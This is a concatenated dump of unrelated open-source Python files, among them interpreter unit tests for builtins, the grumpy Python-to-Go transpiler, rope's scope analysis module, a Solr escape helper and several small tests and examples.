self.assertRaises(TypeError, s.endswith, ("here",None),-len(s) + 4, 2)
self.assertRaises(TypeError, s.endswith, ("here000",None),-len(s) + 4, 2)
self.assertRaises(TypeError, s.endswith, (None, "he"),-len(s) + 4, 2)
self.assertRaises(TypeError, s.endswith, (A, None, "string"),-len(s) + 4, 2)
self.assertEqual(s.endswith(("hera","nomatch"),-len(s) + 4, 2), False)
# end == start
self.assertRaises(TypeError,s.endswith, ("here",None),-6, len(s) -6)
self.assertEqual(s.endswith(("",None),-6, len(s) -6), True)
# with +ve start , -ve end
# end > start
self.assertEqual(s.endswith((m1,None),4,-6 ), True)
self.assertEqual(s.endswith((m1,"nomatch"),4,-7), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, -6)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , -6)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, -6)
# end < start
self.assertRaises(TypeError, s.endswith, (m1,None),4,-len(s) + 1)
self.assertRaises(TypeError, s.endswith, (n1,None),4, -len(s))
self.assertRaises(TypeError, s.endswith, (None, n1),4 , -len(s))
self.assertRaises(TypeError, s.endswith, (A, None, m1),4, -len(s))
self.assertEqual(s.endswith((m1,),4,-len(s) + 1), False)
self.assertEqual(s.endswith((m1,),4,-500), False)
# end == start
self.assertEqual(s.endswith(("",None),4,-len(s) + 4), True)
self.assertEqual(s.endswith((m1,"nomatch"),4,-len(s) + 4), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, -len(s) + 4)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , -len(s) + 4)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, -len(s) + 4)
# with -ve start , -ve end
# end > start
self.assertEqual(s.endswith(("stri",None),-6, -2), True)
self.assertEqual(s.endswith(("string","nomatch"),-6, -1), False)
self.assertEqual(s.endswith(("stro","nomatch"),-6, -2), False)
self.assertEqual(s.endswith(("stron","nomatch"),-6,-1), False)
self.assertEqual(s.endswith(("stringand","nomatch"),-6,-1), False)
self.assertRaises(TypeError, s.endswith,("string000",None),-6, -1)
self.assertRaises(TypeError, s.endswith,(None, "string"),-6, -1)
self.assertRaises(TypeError, s.endswith,(A, None, "string"),-6,-1)
self.assertEqual(s.endswith(("here","nomatch"),-len(s), -len(s)+4), True)
self.assertEqual(s.endswith(("here","nomatch"),-len(s), -len(s) + 2), False)
self.assertEqual(s.endswith(("here","nomatch"),-len(s) - 1, -len(s)+4 ), True)
self.assertEqual(s.endswith(("here","nomatch"),-len(s) - 1, -len(s) + 2), False)
# end < start
self.assertRaises(TypeError, s.endswith, ("here",None),-len(s) + 5, -len(s) + 4)
self.assertRaises(TypeError, s.endswith, ("here000",None),-len(s) + 5, -len(s) + 4)
self.assertRaises(TypeError, s.endswith, (None, "here"),-len(s) + 5, -len(s) + 4)
self.assertRaises(TypeError, s.endswith, (A, None, "here"),-len(s) + 5, -len(s) + 4)
self.assertEqual(s.endswith(("hera","nomatch"),-len(s) + 5, -len(s) + 4), False)
# end == start
self.assertEqual(s.endswith(("here","nomatch"),-6, -6), False)
self.assertEqual(s.endswith(("",None),-6, -6), True)
def test_any(self):
class A: pass
a = A()
class enum:
def __iter__(self):
return [1,2,3].__iter__()
self.assertEqual(any(enum()),True) # enumerable class
self.assertRaises(TypeError,any,a)# non - enumerable class
self.assertRaises(TypeError,any,0.000000) # non - enumerable object
self.assertEqual(any([0.0000000,0,False]),False)# all False
self.assertEqual(any((0,False,a)),True) # True class
self.assertEqual(any((0,False,None,"")),False) # None and ""
self.assertEqual(any([]),False) # no items in array
self.assertEqual(any([None]),False) # only None in array
self.assertEqual(any([None,a]),True) # only None and an Object in array
self.assertEqual(any({0:0,False:"hi"}),False) # Dict with All False
        self.assertEqual(any({True:0,False:"hi"}),True) # Dict with only 1 True
self.assertEqual(any({a:"hello",False:"bye"}),True) # Dict with Class
class mylist(list):
def __iter__(self):
return [1,2,0].__iter__()
self.assertEqual(any(mylist()),True)
class raiser:
def __nonzero__(self):
raise RuntimeError
self.assertEqual(any([None,False,0,1,raiser()]),True) # True before the raiser()
self.assertRaises(RuntimeError,any,[None,False,0,0,raiser(),1,2]) # True after the raiser()
self.assertRaises(RuntimeError,any,{None:"",0:1000,raiser():True}) # raiser in dict
self.assertRaises(TypeError,any) # any without any params
self.assertRaises(TypeError,any,(20,30,40),(50,60,70))# any with more params
def test_all(self):
class A: pass
a = A()
class enum:
def __iter__(self):
return [1,2,3].__iter__()
self.assertEqual(all(enum()),True) # enumerable class
self.assertRaises(TypeError,all,a) # non - enumerable class
self.assertRaises(TypeError,all,0.000000) # non - enumerable object
self.assertEqual(all([0.0000000,0,False]),False) # all False
self.assertEqual(all([True,1.89,"hello",a]),True) # all true array ( bool, double, str, class)
self.assertEqual(all((True,1.89,"hello",a)),True) # all true tuple ( bool, double, str, class)
self.assertEqual(all((True,"hello",a,None)),False) # one None in Tuple
self.assertEqual(all((0,False,None,"")),False) # Tuple with None and ""
self.assertEqual(all([]),True) # with empty array
        self.assertEqual(all([None]),False) # array with only None
self.assertEqual(all([a,None]),False) # array with None and Class
self.assertEqual(all({"hello":"hi",True:0,False:"hi",0:0}),False) # dict with some True, False
self.assertEqual(all({True:0,100:"hi","hello":200,a:100}),True) # dict with all True
class mylist(list):
def __iter__(self):
return [1,2,0].__iter__()
self.assertEqual(all(mylist()),False)
class raiser:
def __nonzero__(self):
raise RuntimeError
        self.assertEqual(all([None,False,0,1,raiser()]),False) # array with raiser() after False
        self.assertEqual(all({None:"",0:1000,raiser():True}),False) # Dict with raiser after False
self.assertRaises(RuntimeError,all,[raiser(),200,None,False,0,1,2])# Array with raiser before False
self.assertRaises(RuntimeError,all,{raiser():True,200:"",300:1000})# Dict with raiser before False
self.assertRaises(TypeError,all) # no params
self.assertRaises(TypeError,all,(20,30,40),(50,60,70)) # extra params
def test_max_with_kwarg(self):
class A(int):
def __len__(self):
return 10
a=A()
self.assertEqual(max(a,"aaaaaaa",key=len),a) # 2 args + buitin method
def userfunc(arg):
if(arg == None):return -1
if(type(arg) == bool):return 0
if(type(arg) == int):return 10
if(type(arg) == str):return len(arg)
if(type(arg) == list):return len(arg)
return 40
self.assertEqual(max(["b","aaaaaaaaaaaaaaaaa",["this",True,"is","Python"],0, a, None],key=userfunc),a)# array + user method
self.assertEqual(max(("b","aaa",["this",True,"is","Python"],0, 1.8, True,a, None),key=userfunc),1.8)# Tuple + user method
self.assertEqual(max("b","aaa",["this",None,"is","Python"], True,None,key=userfunc),["this",None,"is","Python"])# param list + user method
# error scenarios
#apply invalid key k
try: max("aaaaa","b",k=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-existing Name
try: max([1,2,3,4],key=method)
except NameError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-callable Method
method = 100
try: max([1,2,3,4],key=method)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply callable on empty list
try: max([],key=len)
except ValueError:pass
else: self.fail("Expected ValueError, but found None")
#apply callable on non-enumerable type
try: max(None,key=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply Method on non callable class
class B:pass
try: max((B(),"hi"),key=len)
except AttributeError:pass
else: self.fail("Expected AttributeError, but found None")
def test_min_with_kwarg(self):
class A(int):
def __len__(self):
return 0
a=A()
self.assertEqual(min(a,"aaaaaaa",key=len),a) # 2 args + buitin method
def userfunc(arg):
if(arg == None):return 100
if(type(arg) == bool):return 90
if(type(arg) == int):return 80
if(type(arg) == str):return len(arg)
if(type(arg) == list):return len(arg)
return 5
self.assertEqual(min(["aaaaaaaaaaaaaaaaa",["this",True,"is","Python","Iron","Python"],0, a, None],key=userfunc),a)# array + user method
self.assertEqual(min(("aaaaaaaaaaaaa",["this",True,"is","Python","Iron","Python"],0, 1.8, True,a, None),key=userfunc),1.8)# Tuple + user method
self.assertEqual(min("aaaaaaaaaaaaaa",["this",None,"is","Python"], True,None,key=userfunc),["this",None,"is","Python"])# param list + user method
# error scenarios
#apply invalid key k
try: min("aaaaa","b",k=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-existing Name
try: min([1,2,3,4],key=method)
except NameError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-callable Method
method = 100;
try: min([1,2,3,4],key=method)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply callable on empty list
try: min([],key=len)
except ValueError:pass
else: self.fail("Expected ValueError, but found None")
#apply callable on non-enumerable type
try: min(None,key=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply Method on non callable class
class B:pass
try: min((B(),"hi"),key=len)
except AttributeError:pass
else: self.fail("Expected AttributeError, but found None")
def test_missing(self):
# dict base class should not have __missing__
self.assertEqual(hasattr(dict, "__missing__"), False)
# positive cases
class A(dict):
def __missing__(self,key):
return 100
a = A({1:1, "hi":"bye"})
def fun():pass
self.assertEqual(hasattr(A, "__missing__"), True)
self.assertEqual( (a["hi"],a[23112],a["das"], a[None],a[fun],getattr(a,"__missing__")("IP")),("bye",100,100,100,100,100))
# negative case
try: a[not_a_name]
except NameError: pass
except: self.fail("Expected NameError, but found", sys.exc_info())
else: self.fail("Expected NameError, but found None")
        # extra parameters
self.assertRaises(TypeError,a.__missing__,300,400)
        # too few parameters
self.assertRaises(TypeError,a.__missing__)
self.assertRaises(TypeError,a.__getitem__,A())
#invalid __missing__ methods
A.__missing__ = "dont call me!"
self.assertRaises(TypeError,a.__getitem__,300)
        # set __missing__ to a new function
def newmissing(self,key): return key/2
A.__missing__ = newmissing
self.assertEqual( a[999], 999/2);
self.assertRaises(TypeError,a.__getitem__,"sometext")
del A.__missing__
self.assertEqual( a[1], 1);
self.assertRaises(KeyError,a.__getitem__,"sometext")
# inheritance scenarios
#basic inheritance
class M(dict):
def __missing__(self,key): return 99
class N(M):pass
self.assertEqual(N({"hi":"bye"})["none"], 99)
class C:
def __missing__(self,key): return 100
class D(C,dict):pass
self.assertEqual(D({"hi":"bye"})["none"], 100)
# inheritance -> override __missing__
class E(dict):
def __missing__(self,key): return 100
class F(E,dict):
def __missing__(self,key): return 50
self.assertEqual(F({"hi":"bye"})["none"], 50)
def test_with(self):
        # nested with statements cannot contain a yield
class J:
def __enter__(self):pass
def __exit__(self,a,b,c):pass
try:
c = compile(
"""def nest():
with J():
with J():
yield 100
""","","exec")
except SyntaxError,e: pass
def test_importwarning(self):
exc_list = []
exc_list.append(ImportWarning())
exc_list.append(ImportWarning("some message"))
import exceptions
exc_list.append(exceptions.ImportWarning())
exc_list.append(exceptions.ImportWarning("some message"))
for exc in exc_list:
try:
raise exc
except exceptions.ImportWarning, e:
pass
def test_overflowwarning(self):
self.assertRaises(AttributeError, lambda: exceptions.OverflowWarning)
def test_cp5609(self):
from os import remove
temp_name = "test_cp5609.txt"
with open(temp_name, "w") as f:
self.assertTrue(not f.closed)
f.write("xyz")
self.assertTrue(hasattr(f, "__enter__"))
self.assertTrue(hasattr(f, "__exit__"))
self.assertTrue(f.closed)
with open(temp_name, "r") as f:
self.assertTrue(not f.closed)
self.assertEqual(f.readlines(), ["xyz"])
self.assertTrue(hasattr(f, "__enter__"))
self.assertTrue(hasattr(f, "__exit__"))
self.assertTrue(f.closed)
remove(temp_name)
run_test(__name__)
|
example.py
|
gaojiuli/xweb
| 357 |
88944
|
from xweb import App, Model, RESTController
class UserModel(Model):
schema = {
"type": "object",
"properties": {
"username": {"type": "string"},
"password": {"type": "string"},
},
"required": ['username']
}
class EventController(RESTController):
async def get(self):
Model.validate(self.ctx.json)
self.ctx.body = {"Hello": "World"}
app = App()
app.routes = {
'/': EventController
}
app.listen()
|
allennlp/nn/parallel/__init__.py
|
MSLars/allennlp
| 11,433 |
88956
|
<filename>allennlp/nn/parallel/__init__.py
from allennlp.nn.parallel.sharded_module_mixin import ShardedModuleMixin
from allennlp.nn.parallel.ddp_accelerator import (
DdpAccelerator,
DdpWrappedModel,
TorchDdpAccelerator,
)
from allennlp.nn.parallel.fairscale_fsdp_accelerator import (
FairScaleFsdpAccelerator,
FairScaleFsdpWrappedModel,
)
|
Arrays/longest_increasing_subarray.py
|
techsavvyy/coding-problems
| 2,647 |
89002
|
<filename>Arrays/longest_increasing_subarray.py<gh_stars>1000+
'''
Longest Increasing Subarray
Find the longest increasing subarray (a subarray is a contiguous run of neighboring elements in the original array).
Input: [10, 1, 3, 8, 2, 0, 5, 7, 12, 3]
Output: 4
=========================================
In a single pass, check whether each element is bigger than the previous one and increase the counter when it is.
Time Complexity: O(N)
Space Complexity: O(1)
'''
############
# Solution #
############
def longest_increasing_subarray(arr):
n = len(arr)
longest = 0
current = 1
i = 1
while i < n:
if arr[i] < arr[i - 1]:
longest = max(longest, current)
current = 1
else:
current += 1
i += 1
# check again for max, maybe the last element is a part of the longest subarray
return max(longest, current)
###########
# Testing #
###########
# Test 1
# Correct result => 4
print(longest_increasing_subarray([10, 1, 3, 8, 2, 0, 5, 7, 12, 3]))
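# Additional illustrative checks (a hedged sketch added here, not part of the
# original file): an already-increasing array and a strictly decreasing one.
# Correct result => 10
print(longest_increasing_subarray(list(range(10))))
# Correct result => 1
print(longest_increasing_subarray([5, 4, 3, 2, 1]))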
|
asq/test/test_to_set.py
|
sixty-north/asq
| 175 |
89007
|
import unittest
from asq.queryables import Queryable
__author__ = "<NAME>"
class TestToSet(unittest.TestCase):
def test_to_set(self):
a = [1, 2, 4, 8, 16, 32]
b = Queryable(a).to_set()
c = set([1, 2, 4, 8, 16, 32])
self.assertEqual(b, c)
def test_to_set_closed(self):
a = [1, 2, 4, 8, 16, 32]
b = Queryable(a)
b.close()
self.assertRaises(ValueError, lambda: b.to_set())
def test_to_set_duplicates(self):
a = [1, 2, 4, 8, 8, 16, 32]
b = Queryable(a)
self.assertRaises(ValueError, lambda: b.to_set())
|
grumpy-tools-src/grumpy_tools/grumpc.py
|
Srinivas11789/grumpy
| 386 |
89015
|
<filename>grumpy-tools-src/grumpy_tools/grumpc.py
#!/usr/bin/env python
# coding=utf-8
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Python -> Go transcompiler."""
from __future__ import unicode_literals
import argparse
import os
import sys
from StringIO import StringIO
import textwrap
import pickle
import logging
import dill
from .compiler import block
from .compiler import imputil
from .compiler import stmt
from .compiler import util
from .compiler.parser import patch_pythonparser
import pythonparser
from .pep_support.pep3147pycache import make_transpiled_module_folders, should_refresh, set_checksum, fixed_keyword
from . import pydeps
logger = logging.getLogger(__name__)
def _parse_and_visit(stream, script, modname):
patch_pythonparser()
gopath = os.environ['GOPATH']
stream.seek(0)
py_contents = stream.read()
mod = pythonparser.parse(py_contents)
# Do a pass for compiler directives from `from __future__ import *` statements
future_node, future_features = imputil.parse_future_features(mod)
importer = imputil.Importer(gopath, modname, script,
future_features.absolute_import)
full_package_name = modname.replace('.', '/')
mod_block = block.ModuleBlock(importer, full_package_name, script,
py_contents, future_features)
visitor = stmt.StatementVisitor(mod_block, future_node)
# Indent so that the module body is aligned with the goto labels.
with visitor.writer.indent_block():
visitor.visit(mod)
return visitor, mod_block
def _collect_deps(script, modname, pep3147_folders, from_cache=False, update_cache=True):
if from_cache:
try:
with open(pep3147_folders['dependencies_file']) as deps_dumpfile:
deps, import_objects = pickle.load(deps_dumpfile)
return deps, import_objects
except Exception as err:
# Race conditions with other scripts running or stale/broken dump
logger.info("Could not load dependencies of '%s' from cache.", modname)
if os.path.exists(script):
deps, import_objects = pydeps.main(script, modname, with_imports=True) #, script, gopath)
elif os.path.exists(os.path.join(pep3147_folders['cache_folder'], os.path.basename(script))):
deps, import_objects = pydeps.main(
os.path.join(pep3147_folders['cache_folder'], os.path.basename(script)),
modname,
package_dir=os.path.dirname(script),
with_imports=True,
)
else:
raise NotImplementedError()
deps = set(deps).difference(_get_parent_packages(modname))
if update_cache:
try:
with open(pep3147_folders['dependencies_file'], 'wb') as deps_dumpfile:
pickle.dump((deps, import_objects), deps_dumpfile)
except Exception as err:
logger.warning("Could not store dependencies of '%s' on cache: %s", modname, err)
else:
logger.debug("Dependencies file regenerated")
return deps, import_objects
def _recursively_transpile(import_objects, ignore=None):
ignore = ignore or set()
for imp_obj in import_objects:
if not imp_obj.is_native:
name = imp_obj.name[1:] if imp_obj.name.startswith('.') else imp_obj.name
if imp_obj.name in ignore:
# logger.debug("Already collected '%s'. Ignoring", imp_obj.name)
continue # Do not do cyclic imports
if not imp_obj.script:
logger.debug("Importing '%s' will raise ImportError", imp_obj.name)
ignore.add(imp_obj.name)
continue # Let the ImportError raise on run time
# Recursively compile the discovered imports
result = main(stream=open(imp_obj.script), modname=name, pep3147=True,
recursive=True, return_gocode=False, return_deps=True,
ignore=ignore)
if name.endswith('.__init__'):
name = name.rpartition('.__init__')[0]
result = main(stream=open(imp_obj.script), modname=name, pep3147=True,
recursive=True, return_gocode=False, return_deps=True,
ignore=ignore)
yield result['deps']
def _transpile(script, modname, imports, visitor, mod_block):
file_buffer = StringIO()
writer = util.Writer(file_buffer)
tmpl = textwrap.dedent("""\
package $package
import (
\tπg "grumpy"
$imports
)
var Code *πg.Code
func init() {
\tCode = πg.NewCode("<module>", $script, nil, 0, func(πF *πg.Frame, _ []*πg.Object) (*πg.Object, *πg.BaseException) {
\t\tvar πR *πg.Object; _ = πR
\t\tvar πE *πg.BaseException; _ = πE""")
writer.write_tmpl(tmpl, package=fixed_keyword(modname.split('.')[-1]),
script=util.go_str(script), imports=imports)
with writer.indent_block(2):
for s in sorted(mod_block.strings):
writer.write('ß{} := πg.InternStr({})'.format(s, util.go_str(s)))
writer.write_temp_decls(mod_block)
writer.write_block(mod_block, visitor.writer.getvalue())
writer.write_tmpl(textwrap.dedent("""\
\t\treturn nil, πE
\t})
\tπg.RegisterModule($modname, Code)
}"""), modname=util.go_str(modname))
return file_buffer
def main(stream=None, modname=None, pep3147=False, recursive=False, return_gocode=True, ignore=None, return_deps=False):
ignore = ignore or set()
ignore.add(modname)
script = os.path.abspath(stream.name)
assert script and modname, 'Script "%s" or Modname "%s" is empty' % (script, modname)
gopath = os.getenv('GOPATH', None)
if not gopath:
raise RuntimeError('GOPATH not set')
pep3147_folders = make_transpiled_module_folders(script, modname)
will_refresh = should_refresh(stream, script, modname)
deps, import_objects = _collect_deps(script, modname, pep3147_folders, from_cache=(not will_refresh))
deps = set(deps)
imports = ''.join('\t// _ "' + _package_name(name) + '"\n' for name in deps)
if will_refresh or return_gocode:
visitor, mod_block = _parse_and_visit(stream, script, modname)
file_buffer = _transpile(script, modname, imports, visitor, mod_block)
else:
file_buffer = None
if recursive:
transitive_deps = _recursively_transpile(import_objects, ignore=ignore)
if pep3147:
new_gopath = pep3147_folders['gopath_folder']
if new_gopath not in os.environ['GOPATH'].split(os.pathsep):
os.environ['GOPATH'] += os.pathsep + new_gopath
if file_buffer:
file_buffer.seek(0)
mod_dir = pep3147_folders['transpiled_module_folder']
with open(os.path.join(mod_dir, 'module.go'), 'w+') as transpiled_file:
transpiled_file.write(file_buffer.read())
set_checksum(stream, script, modname)
result = {}
if return_gocode:
assert file_buffer, "Wrong logic paths. 'file_buffer' should be available here!"
file_buffer.seek(0)
result['gocode'] = file_buffer.read()
if return_deps:
result['deps'] = frozenset(deps.union(*transitive_deps))
return result
def _package_name(modname):
if modname.startswith('__go__/'):
return '__python__/' + modname
return '__python__/' + fixed_keyword(modname).replace('.', '/')
def _get_parent_packages(modname):
package_parts = modname.split('.')
parent_parts = package_parts[:-1]
for i, _ in enumerate(parent_parts):
yield '.'.join(parent_parts[:(-i or None)])
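# Illustrative note (a hedged sketch, not part of the original tool): for a
# dotted module name such as 'pkg.sub.mod', _get_parent_packages yields the
# parent packages from the most specific outwards, i.e. 'pkg.sub' then 'pkg'.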
|
tests/pytest_docker_compose_tests/test_module_scoping_fixtures.py
|
mathieu-lemay/pytest-docker-compose
| 142 |
89026
|
import time
import requests
from urllib.parse import urljoin
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
import pytest
pytest_plugins = ["docker_compose"]
@pytest.fixture(scope="module")
def wait_for_api(module_scoped_container_getter):
"""Wait for the api from my_api_service to become responsive"""
request_session = requests.Session()
retries = Retry(total=5,
backoff_factor=0.1,
status_forcelist=[500, 502, 503, 504])
request_session.mount('http://', HTTPAdapter(max_retries=retries))
service = module_scoped_container_getter.get("my_api_service").network_info[0]
api_url = "http://%s:%s/" % (service.hostname, service.host_port)
assert request_session.get(api_url)
start = time.time()
while 'Exit' not in module_scoped_container_getter.get("my_short_lived_service").human_readable_state:
if time.time() - start >= 5:
raise RuntimeError(
'my_short_lived_service should spin up, echo "Echoing" and '
                'then shut down; since it is still running, something went wrong'
)
time.sleep(.5)
return request_session, api_url
@pytest.fixture
def do_an_insert(wait_for_api):
"""Insert data to the database in the container my_db"""
request_session, api_url = wait_for_api
item_url = 'items/1'
data_string = 'some_data'
request_session.put('%s%s?data_string=%s' % (api_url, item_url, data_string))
yield item_url, data_string
request_session.delete(urljoin(api_url, item_url)).json()
def test_read_an_item(wait_for_api, do_an_insert):
request_session, api_url = wait_for_api
item_url, data_string = do_an_insert
item = request_session.get(api_url + item_url).json()
assert item['data'] == data_string
def test_read_and_write(wait_for_api):
request_session, api_url = wait_for_api
data_string = 'some_other_data'
request_session.put('%sitems/2?data_string=%s' % (api_url, data_string))
item = request_session.get(urljoin(api_url, 'items/2')).json()
assert item['data'] == data_string
request_session.delete(urljoin(api_url, 'items/2'))
def test_read_all(wait_for_api):
request_session, api_url = wait_for_api
assert len(request_session.get(urljoin(api_url, 'items/all')).json()) == 0
if __name__ == '__main__':
pytest.main(['--docker-compose', './my_network', '--docker-compose-no-build'])
|
ltr/helpers/solr_escape.py
|
tanjie123/hello-ltr
| 109 |
89029
|
<filename>ltr/helpers/solr_escape.py
def esc_kw(kw):
""" Take a keyword and escape all the
Solr parts we want to escape!"""
kw = kw.replace('\\', '\\\\') # be sure to do this first, as we inject \!
kw = kw.replace('(', '\(')
kw = kw.replace(')', '\)')
kw = kw.replace('+', '\+')
kw = kw.replace('-', '\-')
kw = kw.replace(':', '\:')
kw = kw.replace('/', '\/')
kw = kw.replace(']', '\]')
kw = kw.replace('[', '\[')
kw = kw.replace('*', '\*')
kw = kw.replace('?', '\?')
kw = kw.replace('{', '\{')
kw = kw.replace('}', '\}')
kw = kw.replace('~', '\~')
return kw
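# Illustrative usage (a hedged sketch, not part of the original helper):
# characters with special meaning in Solr query syntax come back
# backslash-escaped.
if __name__ == '__main__':
    assert esc_kw('title:(foo)') == r'title\:\(foo\)'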
|
blackmamba/lib/rope/base/pyscopes.py
|
oz90210/blackmamba
| 463 |
89030
|
<filename>blackmamba/lib/rope/base/pyscopes.py
import rope.base.builtins
import rope.base.codeanalyze
import rope.base.pynames
from rope.base import ast, exceptions, utils
class Scope(object):
def __init__(self, pycore, pyobject, parent_scope):
self.pycore = pycore
self.pyobject = pyobject
self.parent = parent_scope
def get_names(self):
"""Return the names defined or imported in this scope"""
return self.pyobject.get_attributes()
def get_defined_names(self):
"""Return the names defined in this scope"""
return self.pyobject._get_structural_attributes()
def get_name(self, name):
"""Return name `PyName` defined in this scope"""
if name not in self.get_names():
raise exceptions.NameNotFoundError('name %s not found' % name)
return self.get_names()[name]
def __getitem__(self, key):
"""The same as ``get_name(key)``"""
return self.get_name(key)
def __contains__(self, key):
"""The same as ``key in self.get_names()``"""
return key in self.get_names()
@utils.saveit
def get_scopes(self):
"""Return the subscopes of this scope
The returned scopes should be sorted by the order they appear.
"""
return self._create_scopes()
def lookup(self, name):
if name in self.get_names():
return self.get_names()[name]
if self.parent is not None:
return self.parent._propagated_lookup(name)
return None
def get_propagated_names(self):
"""Return the visible names of this scope
Return the names defined in this scope that are visible from
scopes containing this scope. This method returns the same
dictionary returned by `get_names()` except for `ClassScope`
which returns an empty dict.
"""
return self.get_names()
def _propagated_lookup(self, name):
if name in self.get_propagated_names():
return self.get_propagated_names()[name]
if self.parent is not None:
return self.parent._propagated_lookup(name)
return None
def _create_scopes(self):
return [pydefined.get_scope()
for pydefined in self.pyobject._get_defined_objects()]
def _get_global_scope(self):
current = self
while current.parent is not None:
current = current.parent
return current
def get_start(self):
return self.pyobject.get_ast().lineno
def get_body_start(self):
body = self.pyobject.get_ast().body
if body:
return body[0].lineno
return self.get_start()
def get_end(self):
pymodule = self._get_global_scope().pyobject
return pymodule.logical_lines.logical_line_in(self.logical_end)[1]
@utils.saveit
def get_logical_end(self):
global_scope = self._get_global_scope()
return global_scope._scope_finder.find_scope_end(self)
start = property(get_start)
end = property(get_end)
logical_end = property(get_logical_end)
def get_kind(self):
pass
class GlobalScope(Scope):
def __init__(self, pycore, module):
super(GlobalScope, self).__init__(pycore, module, None)
self.names = module._get_concluded_data()
def get_start(self):
return 1
def get_kind(self):
return 'Module'
def get_name(self, name):
try:
return self.pyobject[name]
except exceptions.AttributeNotFoundError:
if name in self.builtin_names:
return self.builtin_names[name]
raise exceptions.NameNotFoundError('name %s not found' % name)
def get_names(self):
if self.names.get() is None:
result = dict(self.builtin_names)
result.update(super(GlobalScope, self).get_names())
self.names.set(result)
return self.names.get()
def get_inner_scope_for_line(self, lineno, indents=None):
return self._scope_finder.get_holding_scope(self, lineno, indents)
def get_inner_scope_for_offset(self, offset):
return self._scope_finder.get_holding_scope_for_offset(self, offset)
@property
@utils.saveit
def _scope_finder(self):
return _HoldingScopeFinder(self.pyobject)
@property
def builtin_names(self):
return rope.base.builtins.builtins.get_attributes()
class FunctionScope(Scope):
def __init__(self, pycore, pyobject, visitor):
super(FunctionScope, self).__init__(pycore, pyobject,
pyobject.parent.get_scope())
self.names = None
self.returned_asts = None
self.is_generator = None
self.defineds = None
self.visitor = visitor
def _get_names(self):
if self.names is None:
self._visit_function()
return self.names
def _visit_function(self):
if self.names is None:
new_visitor = self.visitor(self.pycore, self.pyobject)
for n in ast.get_child_nodes(self.pyobject.get_ast()):
ast.walk(n, new_visitor)
self.names = new_visitor.names
self.names.update(self.pyobject.get_parameters())
self.returned_asts = new_visitor.returned_asts
self.is_generator = new_visitor.generator
self.defineds = new_visitor.defineds
def _get_returned_asts(self):
if self.names is None:
self._visit_function()
return self.returned_asts
def _is_generator(self):
if self.is_generator is None:
self._get_returned_asts()
return self.is_generator
def get_names(self):
return self._get_names()
def _create_scopes(self):
if self.defineds is None:
self._visit_function()
return [pydefined.get_scope() for pydefined in self.defineds]
def get_kind(self):
return 'Function'
def invalidate_data(self):
for pyname in self.get_names().values():
if isinstance(pyname, (rope.base.pynames.AssignedName,
rope.base.pynames.EvaluatedName)):
pyname.invalidate()
class ClassScope(Scope):
def __init__(self, pycore, pyobject):
super(ClassScope, self).__init__(pycore, pyobject,
pyobject.parent.get_scope())
def get_kind(self):
return 'Class'
def get_propagated_names(self):
return {}
class _HoldingScopeFinder(object):
def __init__(self, pymodule):
self.pymodule = pymodule
def get_indents(self, lineno):
return rope.base.codeanalyze.count_line_indents(
self.lines.get_line(lineno))
def _get_scope_indents(self, scope):
return self.get_indents(scope.get_start())
def get_holding_scope(self, module_scope, lineno, line_indents=None):
if line_indents is None:
line_indents = self.get_indents(lineno)
current_scope = module_scope
new_scope = current_scope
while new_scope is not None and \
(new_scope.get_kind() == 'Module' or
self._get_scope_indents(new_scope) <= line_indents):
current_scope = new_scope
if current_scope.get_start() == lineno and \
current_scope.get_kind() != 'Module':
return current_scope
new_scope = None
for scope in current_scope.get_scopes():
if scope.get_start() <= lineno:
if lineno <= scope.get_end():
new_scope = scope
break
else:
break
return current_scope
def _is_empty_line(self, lineno):
line = self.lines.get_line(lineno)
return line.strip() == '' or line.lstrip().startswith('#')
def _get_body_indents(self, scope):
return self.get_indents(scope.get_body_start())
def get_holding_scope_for_offset(self, scope, offset):
return self.get_holding_scope(
scope, self.lines.get_line_number(offset))
def find_scope_end(self, scope):
if not scope.parent:
return self.lines.length()
end = scope.pyobject.get_ast().body[-1].lineno
scope_start = self.pymodule.logical_lines.logical_line_in(scope.start)
if scope_start[1] >= end:
# handling one-liners
body_indents = self._get_scope_indents(scope) + 4
else:
body_indents = self._get_body_indents(scope)
for l in self.logical_lines.generate_starts(
min(end + 1, self.lines.length()), self.lines.length() + 1):
if not self._is_empty_line(l):
if self.get_indents(l) < body_indents:
return end
else:
end = l
return end
@property
def lines(self):
return self.pymodule.lines
@property
def code(self):
return self.pymodule.source_code
@property
def logical_lines(self):
return self.pymodule.logical_lines
class TemporaryScope(Scope):
"""Currently used for list comprehensions and generator expressions
These scopes do not appear in the `get_scopes()` method of their
parent scopes.
"""
def __init__(self, pycore, parent_scope, names):
super(TemporaryScope, self).__init__(
pycore, parent_scope.pyobject, parent_scope)
self.names = names
def get_names(self):
return self.names
def get_defined_names(self):
return self.names
def _create_scopes(self):
return []
def get_kind(self):
return 'Temporary'
|
src/fastapi_quickcrud/__init__.py
|
aebrahim/FastAPIQuickCRUD
| 123 |
89051
|
from .misc.utils import sqlalchemy_to_pydantic
from .crud_router import crud_router_builder
from .misc.type import CrudMethods
|
src/oci/log_analytics/models/create_log_analytics_object_collection_rule_details.py
|
ezequielramos/oci-python-sdk
| 249 |
89073
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
